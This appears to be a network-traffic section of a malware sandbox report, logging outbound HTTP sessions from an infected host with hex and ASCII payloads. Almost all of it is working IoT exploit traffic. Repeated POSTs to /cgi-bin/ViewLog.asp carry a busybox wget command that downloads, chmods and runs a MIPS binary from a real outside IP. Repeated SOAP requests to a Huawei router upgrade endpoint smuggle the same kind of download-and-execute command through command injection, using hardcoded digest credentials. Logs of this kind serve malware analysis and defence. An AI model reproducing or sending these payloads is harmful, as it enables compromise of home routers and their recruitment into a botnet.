                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:10.531294107 CET1246INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1007
                                              Date: Thu, 23 Nov 2023 04:16:10 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 20 28 44 65 62 69 61 6e 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.56 (Debian) - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.56 (Debian)</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              241192.168.2.144155894.120.25.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.772701025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              242192.168.2.1441282156.254.81.637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.784113884 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:14.854099035 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:20.997823954 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:33.029266119 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:58.628252029 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:47.778244972 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              243192.168.2.145556631.136.123.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.959151030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:11.526205063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
